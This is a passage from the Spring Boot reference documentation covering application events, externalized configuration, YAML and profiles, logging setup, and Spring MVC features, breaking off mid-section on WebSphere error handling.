they could also be references to XML configuration or to packages that should be scanned.

It is also possible to configure the `SpringApplication` using an `application.properties`
file. See '<<boot-features-external-config>>' for details.

For a complete list of the configuration options, see the
{dc-spring-boot}/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].



[[boot-features-fluent-builder-api]]
=== Fluent builder API
If you need to build an `ApplicationContext` hierarchy (multiple contexts with a
parent/child relationship), or if you just prefer using a '`fluent`' builder API, you
can use the `SpringApplicationBuilder`.

The `SpringApplicationBuilder` allows you to chain together multiple method calls, and
includes `parent` and `child` methods that allow you to create a hierarchy.

For example:

[source,java,indent=0]
----
	new SpringApplicationBuilder()
		.showBanner(false)
		.sources(Parent.class)
		.child(Application.class)
		.run(args);
----

NOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.
web components *must* be contained within the child context, and the same `Environment`
will be used for both parent and child contexts. See the
{dc-spring-boot}/builder/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder` javadoc]
for full details.



[[boot-features-application-events-and-listeners]]
=== Application events and listeners
In addition to the usual Spring Framework events, such as
{spring-javadoc}/context/event/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],
a `SpringApplication` sends some additional application events. Some events are actually
triggered before the `ApplicationContext` is created.

You can register event listeners in a number of ways, the most common being the
`SpringApplication.addListeners(...)` method.

Application events are sent in the following order, as your application runs:

. An `ApplicationStartedEvent` is sent at the start of a run, but before any
  processing except the registration of listeners and initializers.
. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in
  the context is known, but before the context is created.
. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean
  definitions have been loaded.
. An `ApplicationFailedEvent` is sent if there is an exception on startup.

TIP: You often won't need to use application events, but it can be handy to know that they
exist. Internally, Spring Boot uses events to handle a variety of tasks.
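
For example, here is a minimal sketch that registers a listener for the
`ApplicationEnvironmentPreparedEvent` described above (it reuses the `MySpringConfiguration`
class from the earlier examples; the printed message is purely illustrative):

[source,java,indent=0]
----
	import java.util.Arrays;

	import org.springframework.boot.SpringApplication;
	import org.springframework.boot.context.event.ApplicationEnvironmentPreparedEvent;
	import org.springframework.context.ApplicationListener;

	public class MyApplication {

		public static void main(String[] args) {
			SpringApplication app = new SpringApplication(MySpringConfiguration.class);
			// Register programmatically so the listener also receives events that are
			// triggered before the ApplicationContext itself is created
			app.addListeners(new ApplicationListener<ApplicationEnvironmentPreparedEvent>() {
				@Override
				public void onApplicationEvent(ApplicationEnvironmentPreparedEvent event) {
					System.out.println("Active profiles: "
							+ Arrays.toString(event.getEnvironment().getActiveProfiles()));
				}
			});
			app.run(args);
		}

	}
----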


[[boot-features-web-environment]]
=== Web environment
A `SpringApplication` will attempt to create the right type of `ApplicationContext` on
your behalf. By default, an `AnnotationConfigApplicationContext` or
`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you
are developing a web application or not.

The algorithm used to determine a '`web environment`' is fairly simplistic (based on the
presence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if
you need to override the default.

It is also possible to take complete control of the `ApplicationContext` type that will
be used by calling `setApplicationContextClass(...)`.

TIP: It is often desirable to call `setWebEnvironment(false)` when using `SpringApplication`
within a JUnit test.



[[boot-features-command-line-runner]]
=== Using the CommandLineRunner
If you want access to the raw command line arguments, or you need to run some specific code
once the `SpringApplication` has started, you can implement the `CommandLineRunner`
interface. The `run(String... args)` method will be called on all Spring beans
implementing this interface.

[source,java,indent=0]
----
	import org.springframework.boot.*;
	import org.springframework.stereotype.*;

	@Component
	public class MyBean implements CommandLineRunner {

		public void run(String... args) {
			// Do something...
		}

	}
----

You can additionally implement the `org.springframework.core.Ordered` interface or use the
`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner`
beans are defined that must be called in a specific order.



[[boot-features-application-exit]]
=== Application exit
Each `SpringApplication` will register a shutdown hook with the JVM to ensure that the
`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle
callbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can
be used.

In addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`
interface if they wish to return a specific exit code when the application ends.
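
For example, a minimal sketch of an application that returns a specific exit code when it
ends (the value `42` is purely illustrative):

[source,java,indent=0]
----
	import org.springframework.boot.ExitCodeGenerator;
	import org.springframework.boot.SpringApplication;
	import org.springframework.context.annotation.Bean;
	import org.springframework.context.annotation.Configuration;

	@Configuration
	public class ExitCodeApplication {

		@Bean
		public ExitCodeGenerator exitCodeGenerator() {
			return new ExitCodeGenerator() {
				@Override
				public int getExitCode() {
					// Picked up by SpringApplication.exit(...) below
					return 42;
				}
			};
		}

		public static void main(String[] args) {
			System.exit(SpringApplication.exit(
					SpringApplication.run(ExitCodeApplication.class, args)));
		}

	}
----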


[[boot-features-external-config]]
== Externalized Configuration
Spring Boot allows you to externalize your configuration so you can work with the same
application code in different environments. You can use properties files, YAML files,
environment variables and command-line arguments to externalize configuration. Property
values can be injected directly into your beans using the `@Value` annotation, accessed
via Spring's `Environment` abstraction or bound to structured objects.

Spring Boot uses a very particular `PropertySource` order that is designed to allow
sensible overriding of values; properties are considered in the following order:

. Command line arguments.
. Java System properties (`System.getProperties()`).
. OS environment variables.
. JNDI attributes from `java:comp/env`.
. A `RandomValuePropertySource` that only has properties in `+random.*+`.
. Application properties outside of your packaged jar (`application.properties`
  including YAML and profile variants).
. Application properties packaged inside your jar (`application.properties`
  including YAML and profile variants).
. `@PropertySource` annotations on your `@Configuration` classes.
. Default properties (specified using `SpringApplication.setDefaultProperties`).

To provide a concrete example, suppose you develop a `@Component` that uses a
`name` property:

[source,java,indent=0]
----
	import org.springframework.stereotype.*;
	import org.springframework.beans.factory.annotation.*;

	@Component
	public class MyBean {

		@Value("${name}")
		private String name;

		// ...

	}
----

You can bundle an `application.properties` inside your jar that provides a sensible
default `name`. When running in production, an `application.properties` can be provided
outside of your jar that overrides `name`; and for one-off testing, you can launch with
a specific command line switch (e.g. `java -jar app.jar --name="Spring"`).

The `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets
or test cases). It can produce integers, longs or strings, e.g.

[source,properties,indent=0]
----
	my.secret=${random.value}
	my.number=${random.int}
	my.bignumber=${random.long}
	my.number.less.than.ten=${random.int(10)}
	my.number.in.range=${random.int[1024,65536]}
----

The `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any
character and `value,max` are integers. If `max` is provided then `value` is the minimum
value and `max` is the maximum (exclusive).


[[boot-features-external-config-command-line-args]]
=== Accessing command line properties
By default `SpringApplication` will convert any command line option arguments (starting
with '`--`', e.g. `--server.port=9000`) to a `property` and add it to the Spring
`Environment`. As mentioned above, command line properties always take precedence over
other property sources.

If you don't want command line properties to be added to the `Environment` you can disable
them using `SpringApplication.setAddCommandLineProperties(false)`.



[[boot-features-external-config-application-property-files]]
=== Application property files
`SpringApplication` will load properties from `application.properties` files in the
following locations and add them to the Spring `Environment`:

. A `/config` subdirectory of the current directory.
. The current directory.
. A classpath `/config` package.
. The classpath root.

The list is ordered by precedence (locations higher in the list override lower items).

NOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as
an alternative to '.properties'.

If you don't like `application.properties` as the configuration file name you can switch
to another by specifying a `spring.config.name` environment property. You can also refer
to an explicit location using the `spring.config.location` environment property
(comma-separated list of directory locations, or file paths).

[indent=0]
----
	$ java -jar myproject.jar --spring.config.name=myproject
----

or

[indent=0]
----
	$ java -jar myproject.jar --spring.config.location=classpath:/default.properties,classpath:/override.properties
----

If `spring.config.location` contains directories (as opposed to files) they should end
in `/` (and will be appended with the names generated from `spring.config.name` before
being loaded). The default search path `classpath:,classpath:/config,file:,file:config/`
is always used, irrespective of the value of `spring.config.location`. In that way you
can set up default values for your application in `application.properties` (or whatever
other basename you choose with `spring.config.name`) and override it at runtime with a
different file, keeping the defaults.

NOTE: If you use environment variables rather than system properties, most operating
systems disallow period-separated key names, but you can use underscores instead (e.g.
`SPRING_CONFIG_NAME` instead of `spring.config.name`).

NOTE: If you are running in a container then JNDI properties (in `java:comp/env`) or
servlet context initialization parameters can be used instead of, or as well as,
environment variables or system properties.



[[boot-features-external-config-profile-specific-properties]]
=== Profile specific properties
In addition to `application.properties` files, profile specific properties can also be
defined using the naming convention `application-{profile}.properties`.

Profile specific properties are loaded from the same locations as standard
`application.properties`, with profile specific files overriding the default ones.



[[boot-features-external-config-placeholders-in-properties]]
=== Placeholders in properties
The values in `application.properties` are filtered through the existing `Environment`
when they are used, so you can refer back to previously defined values (e.g. from System
properties).

[source,properties,indent=0]
----
	app.name=MyApp
	app.description=${app.name} is a Spring Boot application
----

TIP: You can also use this technique to create '`short`' variants of existing Spring Boot
properties. See the '<<howto.adoc#howto-use-short-command-line-arguments>>' how-to
for details.



[[boot-features-external-config-yaml]]
=== Using YAML instead of Properties
http://yaml.org[YAML] is a superset of JSON, and as such is a very convenient format
for specifying hierarchical configuration data. The `SpringApplication` class will
automatically support YAML as an alternative to properties whenever you have the
http://code.google.com/p/snakeyaml/[SnakeYAML] library on your classpath.

NOTE: If you use '`starter POMs`' SnakeYAML will be automatically provided via
`spring-boot-starter`.



[[boot-features-external-config-loading-yaml]]
==== Loading YAML
Spring Boot provides two convenient classes that can be used to load YAML documents. The
`YamlPropertiesFactoryBean` will load YAML as `Properties` and the `YamlMapFactoryBean`
will load YAML as a `Map`.

For example, the following YAML document:

[source,yaml,indent=0]
----
	environments:
		dev:
			url: http://dev.bar.com
			name: Developer Setup
		prod:
			url: http://foo.bar.com
			name: My Cool App
----

Would be transformed into these properties:

[source,properties,indent=0]
----
	environments.dev.url=http://dev.bar.com
	environments.dev.name=Developer Setup
	environments.prod.url=http://foo.bar.com
	environments.prod.name=My Cool App
----

YAML lists are represented as property keys with `[index]` dereferencers,
for example this YAML:

[source,yaml,indent=0]
----
	my:
		servers:
			- dev.bar.com
			- foo.bar.com
----

Would be transformed into these properties:

[source,properties,indent=0]
----
	my.servers[0]=dev.bar.com
	my.servers[1]=foo.bar.com
----

To bind to properties like that using the Spring `DataBinder` utilities (which is what
`@ConfigurationProperties` does) you need to have a property in the target bean of type
`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it
with a mutable value, e.g. this will bind to the properties above:

[source,java,indent=0]
----
	@ConfigurationProperties(prefix="my")
	public class Config {

		private List<String> servers = new ArrayList<String>();

		public List<String> getServers() {
			return this.servers;
		}

	}
----
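
If you need to load a YAML document yourself, a minimal sketch (assuming a hypothetical
`servers.yml` file on the classpath containing the `my.servers` list above) might look
like this:

[source,java,indent=0]
----
	import java.util.Properties;

	import org.springframework.beans.factory.config.YamlPropertiesFactoryBean;
	import org.springframework.core.io.ClassPathResource;

	public class YamlLoadingExample {

		public static void main(String[] args) {
			YamlPropertiesFactoryBean yaml = new YamlPropertiesFactoryBean();
			yaml.setResources(new ClassPathResource("servers.yml"));
			// The YAML is flattened into period-separated keys with [index] dereferencers
			Properties properties = yaml.getObject();
			System.out.println(properties.getProperty("my.servers[0]")); // dev.bar.com
		}

	}
----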


[[boot-features-external-config-exposing-yaml-to-spring]]
==== Exposing YAML as properties in the Spring Environment
The `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`
in the Spring `Environment`. This allows you to use the familiar `@Value` annotation with
placeholders syntax to access YAML properties.



[[boot-features-external-config-multi-profile-yaml]]
==== Multi-profile YAML documents
You can specify multiple profile-specific YAML documents in a single file by
using a `spring.profiles` key to indicate when the document applies. For example:

[source,yaml,indent=0]
----
	server:
		address: 192.168.1.100
	---
	spring:
		profiles: development
	server:
		address: 127.0.0.1
	---
	spring:
		profiles: production
	server:
		address: 192.168.1.120
----

In the example above, the `server.address` property will be `127.0.0.1` if the
`development` profile is active. If the `development` and `production` profiles are *not*
enabled, then the value for the property will be `192.168.1.100`.



[[boot-features-external-config-yaml-shortcomings]]
==== YAML shortcomings
YAML files can't be loaded via the `@PropertySource` annotation. So if you need to load
values that way, you need to use a properties file.



[[boot-features-external-config-typesafe-configuration-properties]]
=== Typesafe Configuration Properties
Using the `@Value("${property}")` annotation to inject configuration properties can
sometimes be cumbersome, especially if you are working with multiple properties or
your data is hierarchical in nature. Spring Boot provides an alternative method
of working with properties that allows strongly typed beans to govern and validate
the configuration of your application. For example:

[source,java,indent=0]
----
	@Component
	@ConfigurationProperties(prefix="connection")
	public class ConnectionSettings {

		private String username;

		private InetAddress remoteAddress;

		// ... getters and setters

	}
----

When the `@EnableConfigurationProperties` annotation is applied to your `@Configuration`,
any beans annotated with `@ConfigurationProperties` will be automatically configured
from the `Environment` properties. This style of configuration works particularly well
with the `SpringApplication` external YAML configuration:

[source,yaml,indent=0]
----
	# application.yml

	connection:
		username: admin
		remoteAddress: 192.168.1.1

	# additional configuration as required
----

To work with `@ConfigurationProperties` beans you can just inject them in the same way
as any other bean.

[source,java,indent=0]
----
	@Service
	public class MyService {

		@Autowired
		private ConnectionSettings connection;

		// ...

		@PostConstruct
		public void openConnection() {
			Server server = new Server();
			this.connection.configure(server);
		}

	}
----

It is also possible to shortcut the registration of `@ConfigurationProperties` bean
definitions by simply listing the properties classes directly in the
`@EnableConfigurationProperties` annotation:

[source,java,indent=0]
----
	@Configuration
	@EnableConfigurationProperties(ConnectionSettings.class)
	public class MyConfiguration {
	}
----



[[boot-features-external-config-relaxed-binding]]
==== Relaxed binding
Spring Boot uses some relaxed rules for binding `Environment` properties to
`@ConfigurationProperties` beans, so there doesn't need to be an exact match between
the `Environment` property name and the bean property name. Common examples where this
is useful include underscore separated (e.g. `context_path` binds to `contextPath`), and
capitalized (e.g. `PORT` binds to `port`) environment properties.

Spring will attempt to coerce the external application properties to the right type when
it binds to the `@ConfigurationProperties` beans. If you need custom type conversion you
can provide a `ConversionService` bean (with bean id `conversionService`) or custom
property editors (via a `CustomEditorConfigurer` bean).
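
To make this concrete, each of the following properties (a sketch using the
`ConnectionSettings` bean above; the values are illustrative) should bind to the same
`remoteAddress` field:

[source,properties,indent=0]
----
	connection.remoteAddress=192.168.1.1
	connection.remote-address=192.168.1.1
	connection.remote_address=192.168.1.1
----

An operating system environment variable such as `CONNECTION_REMOTE_ADDRESS` should bind
in the same way.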


[[boot-features-external-config-validation]]
==== @ConfigurationProperties Validation
Spring Boot will attempt to validate external configuration, by default using JSR-303
(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint
annotations to your `@ConfigurationProperties` class:

[source,java,indent=0]
----
	@Component
	@ConfigurationProperties(prefix="connection")
	public class ConnectionSettings {

		@NotNull
		private InetAddress remoteAddress;

		// ... getters and setters

	}
----

You can also add a custom Spring `Validator` by creating a bean definition called
`configurationPropertiesValidator`.

TIP: The `spring-boot-actuator` module includes an endpoint that exposes all
`@ConfigurationProperties` beans. Simply point your web browser to `/configprops`
or use the equivalent JMX endpoint. See the
'<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>'
section for details.



[[boot-features-profiles]]
== Profiles
Spring Profiles provide a way to segregate parts of your application configuration and
make it only available in certain environments. Any `@Component` or `@Configuration` can
be marked with `@Profile` to limit when it is loaded:

[source,java,indent=0]
----
	@Configuration
	@Profile("production")
	public class ProductionConfiguration {

		// ...

	}
----

In the normal Spring way, you can use a `spring.profiles.active`
`Environment` property to specify which profiles are active. You can
specify the property in any of the usual ways, for example you could
include it in your `application.properties`:

[source,properties,indent=0]
----
	spring.profiles.active=dev,hsqldb
----

or specify it on the command line using the switch `--spring.profiles.active=dev,hsqldb`.



[[boot-features-adding-active-profiles]]
=== Adding active profiles
The `spring.profiles.active` property follows the same ordering rules as other
properties: the highest `PropertySource` will win. This means that you can specify
active profiles in `application.properties` then *replace* them using the command line
switch.

Sometimes it is useful to have profile specific properties that *add* to the active
profiles rather than replace them. The `spring.profiles.include` property can be used
to unconditionally add active profiles. The `SpringApplication` entry point also has
a Java API for setting additional profiles (i.e. on top of those activated by the
`spring.profiles.active` property): see the `setAdditionalProfiles()` method.

For example, when an application with the following properties is run using the switch
`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:

[source,yaml,indent=0]
----
	---
	my.property: fromyamlfile
	---
	spring.profiles: prod
	spring.profiles.include: proddb,prodmq
----

NOTE: Remember that the `spring.profiles` property can be defined in a YAML document
to determine when this particular document is included in the configuration. See
<<howto-change-configuration-depending-on-the-environment>> for more details.



[[boot-features-programmatically-setting-profiles]]
=== Programmatically setting profiles
You can programmatically set active profiles by calling
`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also
possible to activate profiles using Spring's `ConfigurableEnvironment` interface.
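
For example, a minimal sketch (the `dev` profile name is illustrative):

[source,java,indent=0]
----
	public static void main(String[] args) {
		SpringApplication app = new SpringApplication(MySpringConfiguration.class);
		// Adds 'dev' on top of any profiles activated via spring.profiles.active
		app.setAdditionalProfiles("dev");
		app.run(args);
	}
----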


[[boot-features-profile-specific-configuration]]
=== Profile specific configuration files
Profile specific variants of both `application.properties` (or `application.yml`) and
files referenced via `@ConfigurationProperties` are considered as files are loaded.
See '<<boot-features-external-config-profile-specific-properties>>' for details.



[[boot-features-logging]]
== Logging
Spring Boot uses http://commons.apache.org/logging[Commons Logging] for all internal
logging, but leaves the underlying log implementation open. Default configurations are
provided for
http://docs.oracle.com/javase/7/docs/api/java/util/logging/package-summary.html[Java Util Logging],
http://logging.apache.org/log4j/[Log4J] and
http://logback.qos.ch/[Logback].
In each case there is console output and file output (rotating, 10 Mb file size).

By default, if you use the '`Starter POMs`', Logback will be used for logging. Appropriate
Logback routing is also included to ensure that dependent libraries that use
Java Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.

TIP: There are a lot of logging frameworks available for Java. Don't worry if the above
list seems confusing. Generally you won't need to change your logging dependencies and
the Spring Boot defaults will work just fine.



[[boot-features-logging-format]]
=== Log format
The default log output from Spring Boot looks like this:

[indent=0]
----
2014-03-05 10:57:51.112  INFO 45469 --- [           main] org.apache.catalina.core.StandardEngine  : Starting Servlet Engine: Apache Tomcat/7.0.52
2014-03-05 10:57:51.253  INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[/]       : Initializing Spring embedded WebApplicationContext
2014-03-05 10:57:51.253  INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader            : Root WebApplicationContext: initialization completed in 1358 ms
2014-03-05 10:57:51.698  INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean        : Mapping servlet: 'dispatcherServlet' to [/]
2014-03-05 10:57:51.702  INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean  : Mapping filter: 'hiddenHttpMethodFilter' to: [/*]
----

The following items are output:

* Date and Time -- Millisecond precision and easily sortable.
* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.
* Process ID.
* A `---` separator to distinguish the start of actual log messages.
* Logger name -- This is usually the source class name (often abbreviated).
* The log message.



[[boot-features-logging-console-output]]
=== Console output
The default log configuration will echo messages to the console as they are written. By
default `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level
messages to the console you can start your application with a `--debug` flag.

[indent=0]
----
	$ java -jar myapp.jar --debug
----

If your terminal supports ANSI, color output will be used to aid readability. You can set
`spring.output.ansi.enabled` to a
{dc-spring-boot}/ansi/AnsiOutput.Enabled.{dc-ext}[supported value] to override the auto
detection.



[[boot-features-logging-file-output]]
=== File output
By default, log files are written to `spring.log` in your `temp` directory and rotate at
10 Mb. You can easily customize the output folder by setting the `logging.path` property
(for example in your `application.properties`). It is also possible to change the filename
using a `logging.file` property. Note that if `logging.file` is used, then setting
`logging.path` has no effect.

As with console output, `ERROR`, `WARN` and `INFO` level messages are logged by default.
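
For example, a sketch of the relevant `application.properties` entries (the values are
illustrative; you would normally set only one of the two):

[source,properties,indent=0]
----
	# Write spring.log to the given directory...
	logging.path=/var/log
	# ...or name the log file directly (logging.path is then ignored)
	logging.file=myapp.log
----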


[[boot-features-custom-log-levels]]
=== Log Levels
All the supported logging systems can have the logger levels set in the Spring
`Environment` (so for example in `application.properties`) using '`+logging.level.*=LEVEL+`'
where '`LEVEL`' is one of TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF. Example
`application.properties`:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	logging.level.org.springframework.web: DEBUG
	logging.level.org.hibernate: ERROR
----



[[boot-features-custom-log-configuration]]
=== Custom log configuration
The various logging systems can be activated by including the appropriate libraries on
the classpath, and further customized by providing a suitable configuration file in the
root of the classpath, or in a location specified by the Spring `Environment` property
`logging.config`. (Note however that since logging is initialized *before* the
`ApplicationContext` is created, it isn't possible to control logging from
`@PropertySources` in Spring `@Configuration` files. System properties and the
conventional Spring Boot external configuration files work just fine.)

Depending on your logging system, the following files will be loaded:

|===
|Logging System |Customization

|Logback
|`logback.xml`

|Log4j
|`log4j.properties` or `log4j.xml`

|JDK (Java Util Logging)
|`logging.properties`
|===
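
For example, a minimal `logback.xml` that extends rather than replaces the Spring Boot
defaults might look like the following sketch (the `base.xml` include ships inside
`spring-boot.jar`; the `DEBUG` logger is illustrative):

[source,xml,indent=0]
----
	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
		<!-- Keep Spring Boot's default console and file appenders -->
		<include resource="org/springframework/boot/logging/logback/base.xml"/>
		<logger name="org.springframework.web" level="DEBUG"/>
	</configuration>
----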

To help with the customization some other properties are transferred from the Spring
`Environment` to System properties:

|===
|Spring Environment |System Property |Comments

|`logging.file`
|`LOG_FILE`
|Used in default log configuration if defined.

|`logging.path`
|`LOG_PATH`
|Used in default log configuration if defined.

|`PID`
|`PID`
|The current process ID (discovered if possible and when not already defined as an OS
 environment variable).
|===

All the supported logging systems can consult System properties when parsing their
configuration files. See the default configurations in `spring-boot.jar` for examples.

WARNING: There are known classloading issues with Java Util Logging that cause problems
when running from an '`executable jar`'. We recommend that you avoid it if at all
possible.



[[boot-features-developing-web-applications]]
== Developing web applications
Spring Boot is well suited for web application development. You can easily create a
self-contained HTTP server using embedded Tomcat or Jetty. Most web applications will
use the `spring-boot-starter-web` module to get up and running quickly.

If you haven't yet developed a Spring Boot web application you can follow the
"Hello World!" example in the
'<<getting-started.adoc#getting-started-first-application, Getting started>>' section.



[[boot-features-spring-mvc]]
=== The '`Spring Web MVC framework`'
The Spring Web MVC framework (often referred to as simply '`Spring MVC`') is a rich
'`model view controller`' web framework. Spring MVC lets you create special `@Controller`
or `@RestController` beans to handle incoming HTTP requests. Methods in your controller
are mapped to HTTP using `@RequestMapping` annotations.

Here is a typical example `@RestController` to serve JSON data:

[source,java,indent=0]
----
	@RestController
	@RequestMapping(value="/users")
	public class MyRestController {

		@RequestMapping(value="/{user}", method=RequestMethod.GET)
		public User getUser(@PathVariable Long user) {
			// ...
		}

		@RequestMapping(value="/{user}/customers", method=RequestMethod.GET)
		List<Customer> getUserCustomers(@PathVariable Long user) {
			// ...
		}

		@RequestMapping(value="/{user}", method=RequestMethod.DELETE)
		public User deleteUser(@PathVariable Long user) {
			// ...
		}

	}
----

Spring MVC is part of the core Spring Framework and detailed information is available in
the {spring-reference}#mvc[reference documentation]. There are also several guides
available at http://spring.io/guides that cover Spring MVC.



[[boot-features-spring-mvc-auto-configuration]]
==== Spring MVC auto-configuration
Spring Boot provides auto-configuration for Spring MVC that works well with most
applications.

The auto-configuration adds the following features on top of Spring's defaults:

* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.
* Support for serving static resources, including support for WebJars (see below).
* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.
* Support for `HttpMessageConverters` (see below).
* Automatic registration of `MessageCodesResolver` (see below).
* Static `index.html` support.
* Custom `Favicon` support.

If you want to take complete control of Spring MVC, you can add your own `@Configuration`
annotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and
you just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,
formatters, view controllers etc.) you can add your own `@Bean` of type
`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.
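
For example, a minimal sketch that keeps the auto-configuration and simply adds an extra
view controller (the `/login` mapping and `login` view name are illustrative):

[source,java,indent=0]
----
	import org.springframework.context.annotation.Configuration;
	import org.springframework.web.servlet.config.annotation.ViewControllerRegistry;
	import org.springframework.web.servlet.config.annotation.WebMvcConfigurerAdapter;

	@Configuration
	public class MyMvcConfiguration extends WebMvcConfigurerAdapter {

		@Override
		public void addViewControllers(ViewControllerRegistry registry) {
			// Map '/login' straight to a view without writing a @Controller
			registry.addViewController("/login").setViewName("login");
		}

	}
----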


[[boot-features-spring-mvc-message-converters]]
==== HttpMessageConverters
Spring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and
responses. Sensible defaults are included out of the box, for example Objects can be
automatically converted to JSON (using the Jackson library) or XML (using the Jackson
XML extension if available, else using JAXB).

If you need to add or customize converters you can use Spring Boot's
`HttpMessageConverters` class:

[source,java,indent=0]
----
	import org.springframework.boot.autoconfigure.web.HttpMessageConverters;
	import org.springframework.context.annotation.*;
	import org.springframework.http.converter.*;

	@Configuration
	public class MyConfiguration {

		@Bean
		public HttpMessageConverters customConverters() {
			HttpMessageConverter<?> additional = ...
			HttpMessageConverter<?> another = ...
			return new HttpMessageConverters(additional, another);
		}

	}
----



[[boot-features-spring-message-codes]]
==== MessageCodesResolver
Spring MVC has a strategy for generating error codes for rendering error messages
from binding errors: `MessageCodesResolver`. Spring Boot will create one for you if
you set the `spring.mvc.message-codes-resolver.format` property to `PREFIX_ERROR_CODE` or
`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).



[[boot-features-spring-mvc-static-content]]
==== Static Content
By default Spring Boot will serve static content from a folder called `/static` (or
`/public` or `/resources` or `/META-INF/resources`) in the classpath or from the root
of the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you
can modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the
`addResourceHandlers` method.

In a stand-alone web application the default servlet from the container is also
enabled, and acts as a fallback, serving content from the root of the `ServletContext` if
Spring decides not to handle it. Most of the time this will not happen (unless you modify
the default MVC configuration) because Spring will always be able to handle requests
through the `DispatcherServlet`.

In addition to the '`standard`' static resource locations above, a special case is made for
http://www.webjars.org/[Webjars content]. Any resources with a path in `+/webjars/**+` will
be served from jar files if they are packaged in the Webjars format.

TIP: Do not use the `src/main/webapp` folder if your application will be packaged as a
jar. Although this folder is a common standard, it will *only* work with war packaging
and it will be silently ignored by most build tools if you generate a jar.
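
For example, a sketch of such an override that serves an additional classpath folder (the
`/files/**` pattern and `classpath:/files/` location are illustrative):

[source,java,indent=0]
----
	import org.springframework.context.annotation.Configuration;
	import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry;
	import org.springframework.web.servlet.config.annotation.WebMvcConfigurerAdapter;

	@Configuration
	public class StaticResourceConfiguration extends WebMvcConfigurerAdapter {

		@Override
		public void addResourceHandlers(ResourceHandlerRegistry registry) {
			// Serve the contents of classpath:/files/ at /files/**
			registry.addResourceHandler("/files/**")
					.addResourceLocations("classpath:/files/");
		}

	}
----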


[[boot-features-spring-mvc-template-engines]]
==== Template engines
As well as REST web services, you can also use Spring MVC to serve dynamic HTML content.
Spring MVC supports a variety of templating technologies including Velocity, FreeMarker
and JSPs. Many other templating engines also ship their own Spring MVC integrations.

Spring Boot includes auto-configuration support for the following templating engines:

* http://freemarker.org/docs/[FreeMarker]
* http://beta.groovy-lang.org/docs/groovy-2.3.0/html/documentation/markup-template-engine.html[Groovy]
* http://www.thymeleaf.org[Thymeleaf]
* http://velocity.apache.org[Velocity]

When you're using one of these templating engines with the default configuration, your
templates will be picked up automatically from `src/main/resources/templates`.

TIP: JSPs should be avoided if possible, there are several
<<boot-features-jsp-limitations, known limitations>> when using them with embedded
servlet containers.



[[boot-features-error-handling]]
==== Error Handling
Spring Boot provides an `/error` mapping by default that handles all errors in a
sensible way, and it is registered as a '`global`' error page in the servlet container.
For machine clients it will produce a JSON response with details of the error, the HTTP
status and the exception message. For browser clients there is a '`whitelabel`' error
view that renders the same data in HTML format (to customize it just add a `View` that
resolves to '`error`'). To replace the default behaviour completely you can implement
`ErrorController` and register a bean definition of that type, or simply add a bean
of type `ErrorAttributes` to use the existing mechanism but replace the contents.

If you want more specific error pages for some conditions, the embedded servlet containers
support a uniform Java DSL for customizing the error handling. For example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public EmbeddedServletContainerCustomizer containerCustomizer() {
		return new MyCustomizer();
	}

	// ...

	private static class MyCustomizer implements EmbeddedServletContainerCustomizer {

		@Override
		public void customize(ConfigurableEmbeddedServletContainer container) {
			container.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, "/400"));
		}

	}
----

You can also use regular Spring MVC features like
{spring-reference}/#mvc-exceptionhandlers[`@ExceptionHandler` methods] and
{spring-reference}/#mvc-ann-controller-advice[`@ControllerAdvice`]. The `ErrorController`
will then pick up any unhandled exceptions.

N.B. if you register an `ErrorPage` with a path that will end up being handled by a
`Filter` (e.g. as is common with some non-Spring web frameworks, like Jersey and Wicket),
then the `Filter` has to be explicitly registered as an `ERROR` dispatcher, e.g.

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public FilterRegistrationBean myFilter() {
		FilterRegistrationBean registration = new FilterRegistrationBean();
		registration.setFilter(new MyFilter());
		...
		registration.setDispatcherTypes(EnumSet.allOf(DispatcherType.class));
		return registration;
	}
----

(the default `FilterRegistrationBean` does not include the `ERROR` dispatcher type).



[[boot-features-error-handling-websphere]]
===== Error Handling on WebSphere Application Server
When deployed to a servlet container, a Spring Boot application uses its error page filter
to forward a request with an error status to the appropriate error page. The request can
only be forwarded to the correct error page if the response has not already been
committed. By default, WebSphere Application Server 8.0 and later commits the response
upon successful completion of a servlet's service method. You should disable this
